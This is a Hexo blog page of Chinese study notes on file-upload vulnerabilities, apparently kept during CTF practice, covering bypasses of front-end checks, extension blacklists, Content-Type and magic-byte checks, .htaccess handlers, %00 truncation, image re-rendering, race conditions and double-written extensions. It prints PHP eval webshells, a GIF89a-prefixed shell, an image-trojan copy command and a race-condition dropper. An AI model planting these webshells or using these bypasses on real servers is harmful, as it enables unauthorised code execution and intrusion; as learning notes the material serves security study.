
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <title> | Hexo</title>
        <meta name="author" content="John Doe" />
        <meta name="description" content="" />
        <meta name="keywords" content="" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
        <link rel="icon" href="/images/favicon.png" />
        <script src="https://cdn.staticfile.org/vue/3.2.47/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.3.0/css/all.min.css" />
<link rel="stylesheet" href="/css/fonts.min.css" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>




<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

    <meta name="generator" content="Hexo 6.3.0"></head>
    <body>
        <div id="layout">
            <transition name="fade">
                <div id="loading" v-show="loading">
                    <div id="loading-circle">
                        <h2>LOADING</h2>
                        <p>加载过慢请开启缓存 浏览器默认开启</p>
                        <img src="/images/loading.gif" />
                    </div>
                </div>
            </transition>
            <nav id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <div id="desktop-menu">
        <a class="title" href="/">
            <span>HEXO</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;HEXO</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </div>
</nav>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

            <transition name="into">
                <div id="main" v-show="!loading">
                    <div class="article">
    <div>
        <h1></h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/6/19
        </span>
        
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="文件上传笔记"><a href="#文件上传笔记" class="headerlink" title="文件上传笔记"></a>文件上传笔记</h1><p>文件上传漏洞常触发点：相册、头像上传、视频、照片分享、附件上传（论坛发帖、邮箱）、文件管理器等。</p>
<p>漏洞形成条件：</p>
<ul>
<li>文件能够通过前端和后端过滤和文件处理</li>
<li>文件内容不会改变，能够被正确存储</li>
<li>存储位置在Web容器控制范围内</li>
<li>攻击者有权限访问存储目录并有权执行文件</li>
<li>只要破坏了其中的任一条件即可防止文件上传漏洞。</li>
</ul>
<p>一句话木马：<?php @eval($_POST['attack']);?></p>
<h2 id="1-前端验证"><a href="#1-前端验证" class="headerlink" title="1.前端验证"></a>1.前端验证</h2><p>应用程序是通过前端js代码进行验证，而不再后端程序进行验证，所以我们可以通过burpsuite抓包进行前端验证修改，步骤如下：</p>
<p><img src="F:\网络安全\图片资料\前端js饶过.png"></p>
<p>然后通过剑蚁程序进行文件操作便可成功获得数据。</p>
<h2 id="2-文件名滤过绕过"><a href="#2-文件名滤过绕过" class="headerlink" title="2.文件名滤过绕过"></a>2.文件名滤过绕过</h2><p>原理：js代码通过黑名单的形式判断文件上传类型，并没有完整的过滤功能，攻击者通过上传黑名单以外的文件类型而进行文件验证。</p>
<p>此种过滤方式通常较为单一，将文件后缀改为PHP，php2，phP等便可以成功绕过。具体如下图：</p>
<p><img src="F:\网络安全\图片资料\文件名绕过.png"></p>
<h2 id="3-Content—Type过滤绕过"><a href="#3-Content—Type过滤绕过" class="headerlink" title="3.Content—Type过滤绕过"></a>3.Content—Type过滤绕过</h2><p>不同文件都会有不同的Content—Type，例如JPG文件的Content—Type是image&#x2F;jpeg，PHP文件文件的Content—Type为application&#x2F;xhtml+xml，以下是一些常见文件的Content—Type：</p>
<ul>
<li>文本文件 (.txt)：text&#x2F;plain</li>
<li>HTML 文件 (.html)：text&#x2F;html</li>
<li>CSS 文件 (.css)：text&#x2F;css</li>
<li>JavaScript 文件 (.js)：application&#x2F;javascript</li>
<li>JSON 文件 (.json)：application&#x2F;json</li>
<li>图片文件 (.jpg, .png, .gif)：image&#x2F;jpeg, image&#x2F;png, image&#x2F;gif</li>
<li>PDF 文件 (.pdf)：application&#x2F;pdf</li>
<li>Word 文件 (.docx)：application&#x2F;vnd.openxmlformats-officedocument.wordprocessingml.document</li>
<li>Excel 文件 (.xlsx)：application&#x2F;vnd.openxmlformats-officedocument.spreadsheetml.sheet</li>
<li>PowerPoint 文件 (.pptx)：application&#x2F;vnd.openxmlformats-officedocument.presentationml.presentation</li>
</ul>
<p>此种过滤用的就是判断上传的文件是否为符合要求的文件，若不符合，他就不会上传到服务器，这个时候我们便可以利用bp抓包来修改上传文件的Content—Type，使其变为符合要求的请求头，达到绕过的目的。</p>
<h2 id="4-文件头绕过"><a href="#4-文件头绕过" class="headerlink" title="4.文件头绕过"></a>4.文件头绕过</h2><p>与上一种过滤相同，不同的文件有不同的文件头，防护者通过对上传文件的文件头进行检测，若不是符合要求的文件头，则文件不会被上传，以下是部分常用文件的文件头：</p>
<ul>
<li>JPEG 图像文件 (.jpg, .jpeg): FF D8 FF</li>
<li>PNG 图像文件 (.png): 89 50 4E 47 0D 0A 1A 0A</li>
<li>GIF 图像文件 (.gif): 47 49 46 38 37 61 或 47 49 46 38 39 61</li>
<li>BMP 图像文件 (.bmp): 42 4D</li>
<li>PDF 文件 (.pdf): 25 50 44 46 2D 或 25 50 44 46 2D 31 2E</li>
<li>Word 文件 (.doc, .docx): D0 CF 11 E0 A1 B1 1A E1 或 50 4B 03 04 14 00 06 00</li>
<li>Excel 文件 (.xls, .xlsx): D0 CF 11 E0 A1 B1 1A E1 或 50 4B 03 04 14 00 06 00</li>
<li>PowerPoint 文件 (.ppt, .pptx): D0 CF 11 E0 A1 B1 1A E1 或 50 4B 03 04 14 00 06 00</li>
<li>MP3 音频文件 (.mp3): FF FB 或 FF F3 或 49 44 33</li>
<li>MP4 视频文件 (.mp4): 00 00 00 18 或 00 00 00 20</li>
<li>ZIP 压缩文件 (.zip): 50 4B 03 04</li>
</ul>
<p><strong>注意:上述文件头为十六进制，在写入木马文件时需要将其转化为ascii码。</strong></p>
<p>这种时候，我们如果想要绕过，只需要修改文件的文件头即可完成绕过，修改文件头有以下几种方法：</p>
<ol>
<li><p>直接在木马文件中添加文件头：顾名思义，就是直接在写的木马文件的最前边加上符合要求的文件的文件头，如：GIF文件的文件头GIF89a，故我们只需在代码文件中写入如下内容即可：</p>
<p><code>GIF89a&lt;?php eval($_POST[&#39;shell&#39;]); ?&gt;</code></p>
<p>这段内容即可完成绕过；</p>
</li>
<li><p>文件结合法：除添加文件头之外，还有一种比较常用的方法，不需要记文件头。我们可以直接将木马文件复制到一个文本文件中生成一个新的木马文件，具体操作如下：假设111.jpg是一个文本文件，222.txt是一个木马文件，里边内容为一句话木马；通过copy命令将两个文件结合到333.php文件中，具体代码如下：</p>
<p><code>copy 111.jpg/b + 222.txt/a 333.php</code></p>
<p>上面的<code>/b</code>表示该文件为一个二进制文件，<code>/a</code>表示一个ASCII的文本文件。</p>
</li>
</ol>
<p>在完成木马制作之后，直接上传成功后，用剑蚁连接即可。</p>
<h2 id="5-htaccess文件上传"><a href="#5-htaccess文件上传" class="headerlink" title="5.  .htaccess文件上传"></a>5.  .htaccess文件上传</h2><h3 id="htaccess基础"><a href="#htaccess基础" class="headerlink" title="htaccess基础"></a>htaccess基础</h3><p>htaccess是一种用于 Apache Web 服务器的特殊配置文件。是纯文本文件，主要作用有URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止&#x2F;允许特定IP&#x2F;IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。简单来说，就是我们可以通过这个文件将上传的png、jpg等文件以php代码的方式来运行。</p>
<ol>
<li><p>命令使用条件：</p>
<ul>
<li><p>需开启配置文件httpd.conf：  </p>
<p> <code>Options FollowSymLinks AllowOverride None</code></p>
<p>中将None改为All。</p>
</li>
<li><p>去掉Mod_rewrite.so 的注释，开启rewrite模块</p>
<p><code>LoadModule rewrite_module modules/mod_rewrite.so</code></p>
</li>
</ul>
</li>
<li><p>htaccess文件上传配置</p>
<ul>
<li><p>命令构建方法：</p>
<p><code>FilesMatch</code>指令：</p>
<pre class="line-numbers language-htaccess" data-language="htaccess"><code class="language-htaccess">&lt;FilesMatch &quot;\.上传的问价的类型&quot;&gt;  
   SetHandler application&#x2F;x-httpd-php
&lt;&#x2F;FilesMatch&gt;
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><code>AddType</code>指令：</p>
<pre class="line-numbers language-htaccess" data-language="htaccess"><code class="language-htaccess">AddType application&#x2F;x-httpd-php .文件扩展名<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>相比FilesMatch指令来说的话，AddType更加便利，他可以添加多种文件，无需指定文件名。</p>
</li>
</ul>
</li>
</ol>
<p>注意：有的时候他会对你上传的图片进行文件头检查，注意多种组合结合使用。</p>
<p>在上传之后直接用剑蚁进行问价查询，或者远程命令执行即可。</p>
<h2 id="6-文件截断上传"><a href="#6-文件截断上传" class="headerlink" title="6.文件截断上传"></a>6.文件截断上传</h2><ol>
<li><p>原理：</p>
<p>操作系统通常由c语言或汇编语言写成，在这两种语言当中，<code>\0</code>通常用作字符串结尾，故我们在上传文件时，可以修改上传的数据包，在文件名中插入<code>\0</code>,使在操作系统中的文件为我们想要的文件文件类型。</p>
</li>
<li><p>使用前提：</p>
<ul>
<li>php版本小于5.3.29</li>
<li>magic_quotes_gpc &#x3D; Off</li>
</ul>
</li>
<li><p>具体方法：</p>
<p>在上传文件之后，抓包，得到上传的文件的数据包：</p>
<p><img src="F:\网络安全\图片资料\文件上传00截断截图1.png"></p>
<p>然后在文件名处，和filename处进行00截断，注意，截断用的是<code>%00</code>，而非是<code>\0</code>。如下图所示：</p>
<p><img src="F:\网络安全\图片资料\文件上传00截断截图2.png"></p>
<p>在上传完图片之后便可以，用蚁剑进行连结。</p>
<p>以上为get形式传参，若改为post传参，文件路径会在下边。会在Centent—Type的上下方，此时我们依旧需要截断，但无法使用%00，因为post传参不会解码，故我们需要先解码，再截断，或者在hex界面将文件路径的最后改为00即可。</p>
</li>
</ol>
<h2 id="7-二次渲染文件上传"><a href="#7-二次渲染文件上传" class="headerlink" title="7.二次渲染文件上传"></a>7.二次渲染文件上传</h2><ol>
<li><p>原理：在我们上传文件后，网站会对图片进行二次处理（格式、尺寸，保存，删除 要求等），服务器会把里面的内容进行替换更新，处理完成后，根据我们原有的图片生成一个新的图片（标准化）并放到网站对应的标签进行显示。</p>
</li>
<li><p>绕过方法：</p>
<ul>
<li>配合竞争条件文件上传：击者可以利用条件竞争漏洞在服务器上同时上传多个图片，并在处理第一个上传的图片时修改其属性，使其包含恶意代码。恶意代码将在进行二次渲染时被激活，从而导致系统的安全被破坏。</li>
<li>配合文件包含漏洞：就是将木马插入图片当中，使其可以被执行。</li>
</ul>
</li>
<li><p>如何判断图片是否被二次处理，处理之后有什么地方是相同的：</p>
<p>在我们用copy命令制作好一个图片木马之后，上传到服务器之后会展示出来，我们便可以通过图片十六进制查看文件来对比有什么差别。如：</p>
<p><img src="F:\网络安全\图片资料\二次渲染.png"></p>
<p>再进行比较，便可以知道我们原本的muma.png文件在哪些地方变化了，哪些地方没有变化，在没有变化的地方将我们的木马复制过去，便可以保证在被二次渲染时不会被过滤，从而达到绕过的目的。</p>
</li>
</ol>
<h2 id="8-竞争条件文件上传"><a href="#8-竞争条件文件上传" class="headerlink" title="8.竞争条件文件上传"></a>8.竞争条件文件上传</h2><p>该漏洞值多线程在没有进行锁操作的情况下或同步同时进行访问同一个共享代码、变量文件，运行的额结果以来不用线程访问数据的顺序。引用别人的列子：</p>
<p><em>假设两个进程P1和P2共享了变量a。在某一执行时刻，P1更新a为1，在另一时刻，P2更新a为2。因此两个任务竞争地写变量a。在这个例子中，竞争的“失败者”(最后更新的进程）决定了变量a的最终值。多个进程并发访问和操作同一数据且执行结果与访问的特定顺序有关，称为竞争条件。</em></p>
<ul>
<li><p>成因：由于服务器端在处理不同用户的请求时是并发进行处理的，如果对这些并发操作处理不当的话会由于一些时序问题导致一些异常情况的发生；简单来说就是我们上传的代码时在上传之后再进行检测是否包含可疑代码，也就是说，我们的php代码被上传之后，后端会在短时件内把他删除，所以只要我们抢在其删除钱访问代码，便可以成功入侵。或者在其成功进入后端时使其在当前目录下生成一个木马文件也可行。</p>
</li>
<li><p>利用方法：在上传木马时，将木马文件写为:</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token variable">$file</span><span class="token operator">=</span><span class="token function">fopen</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"muma.php"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"w"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$string</span><span class="token operator">=</span><span class="token string single-quoted-string">'&lt;?php @eval($_POST["test"]); ?>'</span><span class="token punctuation">;</span>
	<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token variable">$string</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">fcolse</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>将我们的木马文件写在当前文件路径当中的muma.php文件当中，然后我们直接访问muma.php文件即可。或者说我们利用bp当中的模块，进行多次数据发送，在发送的途中进行蚁剑连结，成功之后即可。</p>
</li>
</ul>
<h2 id="9-双写后缀绕过"><a href="#9-双写后缀绕过" class="headerlink" title="9.双写后缀绕过"></a>9.双写后缀绕过</h2><p>在部分过滤当中，他会将我们上传文件名中不和法的扩展名替换为空格，通常为替换php，但是只会替换一次，在这种时候我们便可以通过此种方法来进行绕过。即将后缀写为<code>pphphp</code>，在将第一个php替换为空格时，第二个空格也会因此出现。便可以成功绕过。</p>
<h2 id="10-做题疑点记录"><a href="#10-做题疑点记录" class="headerlink" title="10.做题疑点记录"></a>10.做题疑点记录</h2><ol>
<li><p>23&#x2F;6&#x2F;13：在写nssctf中的Ez_upload题目时，遇到了没法解决的现象，在上传一个gif图片之后显示：</p>
<p><img src="F:\网络安全\图片资料\做题疑点记录1.png"></p>
<p>期初我以为是我上传的图片类型不合适，于是又尝试了其他两种图片类型，结果都是显示这个状态；于是我又以为文件上传的路径会在返回包里，我又拿bp抓包查看，但在抓包之后依旧未查看到文件路径：</p>
<p><img src="F:\网络安全\图片资料\做题记录2.png"></p>
<p>于是找了题解，题解解释说需将Centent—Cype改成image&#x2F;jpeg，并解释其必须按为此种类型图片才可上传，在尝试过后，果然可行，于是收集了如下常见图片类型的文件头：</p>
<ul>
<li>JPEG（jpg&#x2F;jpeg）：Content-Type 为 image&#x2F;jpeg。</li>
<li>PNG（png）：Content-Type 为 image&#x2F;png。</li>
<li>GIF（gif）：Content-Type 为 image&#x2F;gif。</li>
<li>BMP（bmp）：Content-Type 为 image&#x2F;bmp 或者 image&#x2F;x-windows-bmp。</li>
<li>TIFF（tif&#x2F;tiff）：Content-Type 为 image&#x2F;tiff 或者 image&#x2F;x-tiff。</li>
<li>WebP（webp）：Content-Type 为 image&#x2F;webp。</li>
</ul>
<p>便于在之后的写题中测试。</p>
</li>
</ol>

    </div>
    
    
    
    
    
    
    
</div>

                    <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2023 Hexo
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;John Doe
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

                </div>
            </transition>
            
            <transition name="fade">
                <div id="preview" ref="preview" v-show="previewShow">
                    <img id="preview-content" ref="previewContent" />
                </div>
            </transition>
            
        </div>
        <script src="/js/main.js"></script>
        
        




        
    </body>
</html>
